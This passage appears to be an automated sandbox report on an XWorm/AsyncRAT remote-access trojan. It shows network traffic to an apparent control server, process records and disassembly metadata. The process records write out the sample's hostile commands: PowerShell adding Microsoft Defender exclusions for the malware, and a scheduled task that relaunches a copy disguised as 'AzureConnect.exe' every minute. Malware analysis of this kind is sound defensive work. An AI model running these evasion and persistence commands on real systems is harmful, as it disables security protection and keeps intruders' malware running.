                                                              Dec 10, 2024 19:46:52.821480036 CET380449825147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.821584940 CET498253804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:52.832856894 CET498253804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:52.833668947 CET498263804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:52.834280968 CET380449825147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.946712017 CET380449825147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.959808111 CET380449825147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.959889889 CET380449826147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:46:52.959986925 CET498263804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:52.976133108 CET498263804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:46:53.116664886 CET380449826147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:47:06.396580935 CET498263804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:47:06.524852037 CET380449826147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:47:07.145347118 CET498263804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:47:07.305346012 CET380449826147.185.221.24192.168.2.5
                                                              Dec 10, 2024 19:47:12.770168066 CET498263804192.168.2.5147.185.221.24
                                                              Dec 10, 2024 19:47:12.893556118 CET380449826147.185.221.24192.168.2.5

                                                              Statistics

                                                              CPU Usage

                                                              Click to jump to process

                                                              Memory Usage

                                                              Click to jump to process

                                                              High Level Behavior Distribution

                                                              Click to dive into process behavior distribution

                                                              Behavior

                                                              Click to jump to process

                                                              System Behavior

                                                              General

                                                              Target ID:0
                                                              Start time:13:45:02
                                                              Start date:10/12/2024
                                                              Path:C:\Users\user\Desktop\file.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Users\user\Desktop\file.exe"
                                                              Imagebase:0xf20000
                                                              File size:46'592 bytes
                                                              MD5 hash:2982D11D3B0789476831097F0E213007
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000000.2018283335.0000000000F22000.00000002.00000001.01000000.00000003.sdmp, Author: ditekSHen
                                                              Reputation:low
                                                              Has exited:false

                                                              General

                                                              Target ID:2
                                                              Start time:13:45:06
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:3
                                                              Start time:13:45:06
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:5
                                                              Start time:13:45:14
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:6
                                                              Start time:13:45:14
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:8
                                                              Start time:13:45:25
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:9
                                                              Start time:13:45:25
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:10
                                                              Start time:13:45:39
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'AzureConnect.exe'
                                                              Imagebase:0x7ff7be880000
                                                              File size:452'608 bytes
                                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:11
                                                              Start time:13:45:39
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:13
                                                              Start time:13:46:01
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\schtasks.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "AzureConnect" /tr "C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
                                                              Imagebase:0x7ff636670000
                                                              File size:235'008 bytes
                                                              MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Reputation:high
                                                              Has exited:true

                                                              General

                                                              Target ID:14
                                                              Start time:13:46:01
                                                              Start date:10/12/2024
                                                              Path:C:\Windows\System32\conhost.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                              Imagebase:0x7ff6d64d0000
                                                              File size:862'208 bytes
                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              General

                                                              Target ID:15
                                                              Start time:13:46:03
                                                              Start date:10/12/2024
                                                              Path:C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
                                                              Imagebase:0x340000
                                                              File size:46'592 bytes
                                                              MD5 hash:2982D11D3B0789476831097F0E213007
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Yara matches:
                                                              • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: Joe Security
                                                              • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe, Author: ditekSHen
                                                              Antivirus matches:
                                                              • Detection: 100%, Avira
                                                              • Detection: 100%, Joe Sandbox ML
                                                              • Detection: 79%, ReversingLabs
                                                              Has exited:true

                                                              General

                                                              Target ID:16
                                                              Start time:13:47:01
                                                              Start date:10/12/2024
                                                              Path:C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe
                                                              Wow64 process (32bit):false
                                                              Commandline:"C:\ProgramData\Program Files\Microsoft\AzureConnect\AzureConnect.exe"
                                                              Imagebase:0x730000
                                                              File size:46'592 bytes
                                                              MD5 hash:2982D11D3B0789476831097F0E213007
                                                              Has elevated privileges:true
                                                              Has administrator privileges:true
                                                              Programmed in:C, C++ or other language
                                                              Has exited:true

                                                              Disassembly

                                                              Reset < >

                                                                Execution Graph

                                                                Execution Coverage:17.9%
                                                                Dynamic/Decrypted Code Coverage:100%
                                                                Signature Coverage:0%
                                                                Total number of Nodes:3
                                                                Total number of Limit Nodes:0
                                                                execution_graph 4878 7ff848f11caa 4879 7ff848f12360 RtlSetProcessIsCritical 4878->4879 4881 7ff848f12412 4879->4881

                                                                Executed Functions

                                                                Function 00007FF848F126E9 Relevance: 3.1, Strings: 1, Instructions: 1814COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 0 7ff848f126e9-7ff848f1278c call 7ff848f11d38 call 7ff848f119b8 call 7ff848f119c8 12 7ff848f1278e-7ff848f127bb call 7ff848f119d8 0->12 13 7ff848f127c0-7ff848f127e3 0->13 12->13 17 7ff848f127e9-7ff848f127f6 13->17 18 7ff848f138a0-7ff848f138a7 13->18 19 7ff848f127fc-7ff848f1283a 17->19 20 7ff848f12b57 17->20 21 7ff848f138b1-7ff848f138b8 18->21 27 7ff848f1387b-7ff848f13881 19->27 28 7ff848f12840-7ff848f1285d call 7ff848f119e8 19->28 23 7ff848f12b5c-7ff848f12b90 20->23 24 7ff848f138c9-7ff848f138d0 21->24 25 7ff848f138ba-7ff848f138c2 21->25 32 7ff848f12b98-7ff848f12bda 23->32 25->24 26 7ff848f138c4 call 7ff848f10368 25->26 26->24 30 7ff848f13883-7ff848f1389a 27->30 31 7ff848f138d5 27->31 28->27 36 7ff848f12863-7ff848f1289d 28->36 30->17 30->18 35 7ff848f138da-7ff848f13916 31->35 47 7ff848f12bdc-7ff848f12bfd 32->47 48 7ff848f12bff-7ff848f12c33 32->48 41 7ff848f1391b-7ff848f13968 35->41 45 7ff848f128fc-7ff848f12924 36->45 46 7ff848f1289f-7ff848f128f2 36->46 71 7ff848f1396a-7ff848f1398b 41->71 72 7ff848f13990-7ff848f139cc 41->72 54 7ff848f1292a-7ff848f12937 45->54 55 7ff848f1321c-7ff848f13244 45->55 46->45 53 7ff848f12c3b-7ff848f12c7d 47->53 48->53 77 7ff848f12c7f-7ff848f12ca0 53->77 78 7ff848f12ca2-7ff848f12cd6 53->78 54->20 58 7ff848f1293d-7ff848f12a2f 54->58 55->27 61 7ff848f1324a-7ff848f13257 55->61 138 7ff848f131f3-7ff848f131f9 58->138 139 7ff848f12a35-7ff848f12b32 call 7ff848f10348 58->139 61->20 66 7ff848f1325d-7ff848f13353 61->66 85 7ff848f139d1-7ff848f13a0d 66->85 121 7ff848f13359-7ff848f133bc 66->121 71->72 72->85 84 7ff848f12cde-7ff848f12df5 call 7ff848f10348 77->84 78->84 161 7ff848f12e1a-7ff848f12e4e 84->161 162 7ff848f12df7-7ff848f12e18 84->162 94 7ff848f13a12-7ff848f13a4e 85->94 101 7ff848f13a53-7ff848f13a8f 94->101 111 7ff848f13a94-7ff848f13ad0 101->111 120 7ff848f13ad5-7ff848f13b11 111->120 129 7ff848f13b16-7ff848f13b66 120->129 121->94 144 7ff848f133c2-7ff848f13425 121->144 155 7ff848f13b68-7ff848f13b89 129->155 156 7ff848f13b8e-7ff848f13bc2 129->156 138->31 143 7ff848f131ff-7ff848f13216 138->143 139->23 194 7ff848f12b34-7ff848f12b55 139->194 143->54 143->55 144->101 172 7ff848f1342b-7ff848f13589 call 7ff848f118b8 144->172 155->156 164 7ff848f13bca 156->164 168 7ff848f12e56-7ff848f12eed 161->168 162->168 164->164 168->20 198 7ff848f12ef3-7ff848f130a3 call 7ff848f10348 168->198 172->111 220 7ff848f1358f-7ff848f136fd 172->220 194->32 198->31 244 7ff848f130a9-7ff848f130ab 198->244 220->31 258 7ff848f13703-7ff848f13705 220->258 244->41 245 7ff848f130b1-7ff848f130ef 244->245 245->35 255 7ff848f130f5-7ff848f13180 245->255 270 7ff848f131d0-7ff848f131ed 255->270 271 7ff848f13182-7ff848f131c9 255->271 258->129 260 7ff848f1370b-7ff848f13749 258->260 260->120 269 7ff848f1374f-7ff848f137dd 260->269 279 7ff848f1382d-7ff848f1385c 269->279 280 7ff848f137df-7ff848f13826 269->280 270->138 271->270 279->31 282 7ff848f1385e-7ff848f13875 279->282 280->279 282->27 282->61
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: B
                                                                • API String ID: 0-1255198513
                                                                • Opcode ID: 3ac8d233af04f06bee34eef84b6fe0457276baa902c70a9723edff268a2d2cc0
                                                                • Instruction ID: 7d6cda138dee1c97b6f674eba93eba77de55a5678dad6aa04b8e172cc5ac94ae
                                                                • Opcode Fuzzy Hash: 3ac8d233af04f06bee34eef84b6fe0457276baa902c70a9723edff268a2d2cc0
                                                                • Instruction Fuzzy Hash: B6D2A370A18A099FEB48FF28C89977AB7E2FF98744F144579D04DD3291DF38A8818B45
                                                                Function 00007FF848F18956 Relevance: .5, Instructions: 476COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 710 7ff848f18956-7ff848f18963 711 7ff848f1896e-7ff848f18a37 710->711 712 7ff848f18965-7ff848f1896d 710->712 716 7ff848f18a39-7ff848f18a42 711->716 717 7ff848f18aa3 711->717 712->711 716->717 719 7ff848f18a44-7ff848f18a50 716->719 718 7ff848f18aa5-7ff848f18aca 717->718 726 7ff848f18acc-7ff848f18ad5 718->726 727 7ff848f18b36 718->727 720 7ff848f18a89-7ff848f18aa1 719->720 721 7ff848f18a52-7ff848f18a64 719->721 720->718 722 7ff848f18a68-7ff848f18a7b 721->722 723 7ff848f18a66 721->723 722->722 725 7ff848f18a7d-7ff848f18a85 722->725 723->722 725->720 726->727 729 7ff848f18ad7-7ff848f18ae3 726->729 728 7ff848f18b38-7ff848f18be0 727->728 740 7ff848f18c4e 728->740 741 7ff848f18be2-7ff848f18bec 728->741 730 7ff848f18b1c-7ff848f18b34 729->730 731 7ff848f18ae5-7ff848f18af7 729->731 730->728 733 7ff848f18af9 731->733 734 7ff848f18afb-7ff848f18b0e 731->734 733->734 734->734 736 7ff848f18b10-7ff848f18b18 734->736 736->730 742 7ff848f18c50-7ff848f18c79 740->742 741->740 743 7ff848f18bee-7ff848f18bfb 741->743 749 7ff848f18c7b-7ff848f18c86 742->749 750 7ff848f18ce3 742->750 744 7ff848f18bfd-7ff848f18c0f 743->744 745 7ff848f18c34-7ff848f18c4c 743->745 747 7ff848f18c11 744->747 748 7ff848f18c13-7ff848f18c26 744->748 745->742 747->748 748->748 751 7ff848f18c28-7ff848f18c30 748->751 749->750 752 7ff848f18c88-7ff848f18c96 749->752 753 7ff848f18ce5-7ff848f18d76 750->753 751->745 754 7ff848f18c98-7ff848f18caa 752->754 755 7ff848f18ccf-7ff848f18ce1 752->755 761 7ff848f18d7c-7ff848f18d8b 753->761 756 7ff848f18cac 754->756 757 7ff848f18cae-7ff848f18cc1 754->757 755->753 756->757 757->757 759 7ff848f18cc3-7ff848f18ccb 757->759 759->755 762 7ff848f18d8d 761->762 763 7ff848f18d93-7ff848f18df8 call 7ff848f18e14 761->763 762->763 770 7ff848f18dfa 763->770 771 7ff848f18dff-7ff848f18e13 763->771 770->771
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 90b17306681b944c5d20cd0ebb1f374063f8db4641784a1c30f9756047023845
                                                                • Instruction ID: 3bd1c9891c846ad467b22c406e1bc7e8132b1b830d88394e7c02511f374ff6d5
                                                                • Opcode Fuzzy Hash: 90b17306681b944c5d20cd0ebb1f374063f8db4641784a1c30f9756047023845
                                                                • Instruction Fuzzy Hash: B7F1B23091CA8D8FEBA8EF28C8557E937E1FF54350F44426AE84DC7291DF34A9458B86
                                                                Function 00007FF848F19702 Relevance: .5, Instructions: 462COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 772 7ff848f19702-7ff848f1970f 773 7ff848f1971a-7ff848f197e7 772->773 774 7ff848f19711-7ff848f19719 772->774 778 7ff848f197e9-7ff848f197f2 773->778 779 7ff848f19853 773->779 774->773 778->779 780 7ff848f197f4-7ff848f19800 778->780 781 7ff848f19855-7ff848f1987a 779->781 782 7ff848f19839-7ff848f19851 780->782 783 7ff848f19802-7ff848f19814 780->783 788 7ff848f1987c-7ff848f19885 781->788 789 7ff848f198e6 781->789 782->781 784 7ff848f19818-7ff848f1982b 783->784 785 7ff848f19816 783->785 784->784 787 7ff848f1982d-7ff848f19835 784->787 785->784 787->782 788->789 790 7ff848f19887-7ff848f19893 788->790 791 7ff848f198e8-7ff848f1990d 789->791 792 7ff848f198cc-7ff848f198e4 790->792 793 7ff848f19895-7ff848f198a7 790->793 798 7ff848f1997b 791->798 799 7ff848f1990f-7ff848f19919 791->799 792->791 794 7ff848f198a9 793->794 795 7ff848f198ab-7ff848f198be 793->795 794->795 795->795 797 7ff848f198c0-7ff848f198c8 795->797 797->792 800 7ff848f1997d-7ff848f199ab 798->800 799->798 801 7ff848f1991b-7ff848f19928 799->801 807 7ff848f19a1b 800->807 808 7ff848f199ad-7ff848f199b8 800->808 802 7ff848f1992a-7ff848f1993c 801->802 803 7ff848f19961-7ff848f19979 801->803 805 7ff848f1993e 802->805 806 7ff848f19940-7ff848f19953 802->806 803->800 805->806 806->806 809 7ff848f19955-7ff848f1995d 806->809 811 7ff848f19a1d-7ff848f19af5 807->811 808->807 810 7ff848f199ba-7ff848f199c8 808->810 809->803 812 7ff848f199ca-7ff848f199dc 810->812 813 7ff848f19a01-7ff848f19a19 810->813 821 7ff848f19afb-7ff848f19b0a 811->821 814 7ff848f199de 812->814 815 7ff848f199e0-7ff848f199f3 812->815 813->811 814->815 815->815 818 7ff848f199f5-7ff848f199fd 815->818 818->813 822 7ff848f19b0c 821->822 823 7ff848f19b12-7ff848f19b74 call 7ff848f19b90 821->823 822->823 830 7ff848f19b7b-7ff848f19b8f 823->830 831 7ff848f19b76 823->831 831->830
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: a934b918261e9cf724694c881f96fbca9a2fcdb607f0c0e765448939ef3d112c
                                                                • Instruction ID: 450b8d6ebb1fa117c6754adff6114ec2dac12522169be5bba0246bce1e20c656
                                                                • Opcode Fuzzy Hash: a934b918261e9cf724694c881f96fbca9a2fcdb607f0c0e765448939ef3d112c
                                                                • Instruction Fuzzy Hash: 72E1C030A0CA4E8FEBA9EF28C8557E977D1EF54350F54422ED84DC3695CF78A8448B81
                                                                Function 00007FF848F1232D Relevance: 1.6, APIs: 1, Instructions: 143COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 308 7ff848f1232d-7ff848f12410 RtlSetProcessIsCritical 312 7ff848f12418-7ff848f1244d 308->312 313 7ff848f12412 308->313 313->312
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: c1214565ffc6f5c75d09663357b517d4f63f7fb694584d9c5cd8022a1c0e6fdf
                                                                • Instruction ID: fcec6d5a6dd77e4433bafce33c581c14a7c75dc874d65b3262a536b8a0974c84
                                                                • Opcode Fuzzy Hash: c1214565ffc6f5c75d09663357b517d4f63f7fb694584d9c5cd8022a1c0e6fdf
                                                                • Instruction Fuzzy Hash: F941C33190C6588FDB19DF98D845AE9BBF0FF56311F04416ED08AC3692CB786846CB91
                                                                Function 00007FF848F11CAA Relevance: 1.6, APIs: 1, Instructions: 121COMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 315 7ff848f11caa-7ff848f123aa 318 7ff848f123b2-7ff848f12410 RtlSetProcessIsCritical 315->318 319 7ff848f12418-7ff848f1244d 318->319 320 7ff848f12412 318->320 320->319
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.3318497593.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_7ff848f10000_file.jbxd
                                                                Similarity
                                                                • API ID: CriticalProcess
                                                                • String ID:
                                                                • API String ID: 2695349919-0
                                                                • Opcode ID: 1f7a071ea4b40abbaadc0922abfd1d9e8947696d1c49810728c00e514cf9a4a4
                                                                • Instruction ID: 9d6dc9e5648c04e3547a7f81fc1fce9b2b3199948d695347817acb4fc07067e4
                                                                • Opcode Fuzzy Hash: 1f7a071ea4b40abbaadc0922abfd1d9e8947696d1c49810728c00e514cf9a4a4
                                                                • Instruction Fuzzy Hash: CA31C231908A188FDB18DB9CD845BF9BBF0FF55311F14412EE08AD3682CB7468468B91

                                                                Executed Functions

                                                                Function 00007FF849006605 Relevance: 6.7, Strings: 5, Instructions: 433COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: (B%I$(B%I$(B%I$(B%I$(B%I
                                                                • API String ID: 0-1877043794
                                                                • Opcode ID: c013c4f197c5704e977299a1ecd5b23ff8a725fc560e77006fa889af719b4ae6
                                                                • Instruction ID: 94eee15f0b6c0a93ef4af04d058432221011e5ef99d23d8e46355084b493db5e
                                                                • Opcode Fuzzy Hash: c013c4f197c5704e977299a1ecd5b23ff8a725fc560e77006fa889af719b4ae6
                                                                • Instruction Fuzzy Hash: 99D14431D0EACA5FEF65AF2868155B5BBE1EF16394F0802FAD44DD7093EA18D805C352
                                                                Function 00007FF849004073 Relevance: 1.4, Strings: 1, Instructions: 182COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>%I
                                                                • API String ID: 0-3722309147
                                                                • Opcode ID: 7cf09015f0bcccd7bbc464be200f687598ef75f7d997e8cd3b96c9bf5bbf4d87
                                                                • Instruction ID: 01df258b96635e710718bd2d3b2a7e6ab03aa390aea42ad1b92b1280985adee4
                                                                • Opcode Fuzzy Hash: 7cf09015f0bcccd7bbc464be200f687598ef75f7d997e8cd3b96c9bf5bbf4d87
                                                                • Instruction Fuzzy Hash: 0251E732E0DA864FEBA9EE1C64115B577D2EF54260F5801FAC14EC7193FE28EC158345
                                                                Function 00007FF8490040BF Relevance: 1.3, Strings: 1, Instructions: 95COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2140094897.00007FF849000000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF849000000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff849000000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID: 8>%I
                                                                • API String ID: 0-3722309147
                                                                • Opcode ID: 2b17ccc3b6ae5b8de2a2c481961ac108545bd372e5a57e4d1287f8dbc2af03a8
                                                                • Instruction ID: 173bde0c96228ca90d809c6e6ed9077fc97efd5f5eaceb3bb6154a2780fc49c8
                                                                • Opcode Fuzzy Hash: 2b17ccc3b6ae5b8de2a2c481961ac108545bd372e5a57e4d1287f8dbc2af03a8
                                                                • Instruction Fuzzy Hash: D8218F32E1D9C74FEBB9EE18A4511B476D2EF64290B4905F9C01EC71A3FE28EC148649
                                                                Function 00007FF848F3A042 Relevance: .3, Instructions: 313COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 22ed98d41d416b55d31b096e379b1c4e45325bb22e890b908d0eda6cdc39be8d
                                                                • Instruction ID: 463149a1eee16c0cb3a9bec5ddc63dd2e4574c52d176fe0353ead91acda9f494
                                                                • Opcode Fuzzy Hash: 22ed98d41d416b55d31b096e379b1c4e45325bb22e890b908d0eda6cdc39be8d
                                                                • Instruction Fuzzy Hash: DE414D7281EBD58FD743A77868660E57FB0EF13268F0901F7D0888E0A3DA1D5899C766
                                                                Function 00007FF848F39758 Relevance: .1, Instructions: 133COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139744042.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848f30000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 50b9bde83bb6d418f75a7e62da8e564e31e436dea860488d9e065a0957960ec4
                                                                • Instruction ID: 644c7a560c6e31fa6719edb9c8f8f036537e9b8bf07f1b3a357ee1667dd2400b
                                                                • Opcode Fuzzy Hash: 50b9bde83bb6d418f75a7e62da8e564e31e436dea860488d9e065a0957960ec4
                                                                • Instruction Fuzzy Hash: 5931F77191CB489FDB5C9B5CA8066F97BE0FB99711F00412FE449D3692CB20A8568BC6
                                                                Function 00007FF848E1E2A0 Relevance: .1, Instructions: 125COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000002.00000002.2139378659.00007FF848E1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848E1D000, based on PE: false
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_2_2_7ff848e1d000_powershell.jbxd
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: 89e69226a11e628b629792c410fab283fb35893eae7f4e3492a4bb5752e59bcc
                                                                • Instruction ID: 54db2b2dfb116b0cf0f8b1ddfcc551586cc93a79aa5e64cb479a5fa325cc6d4a
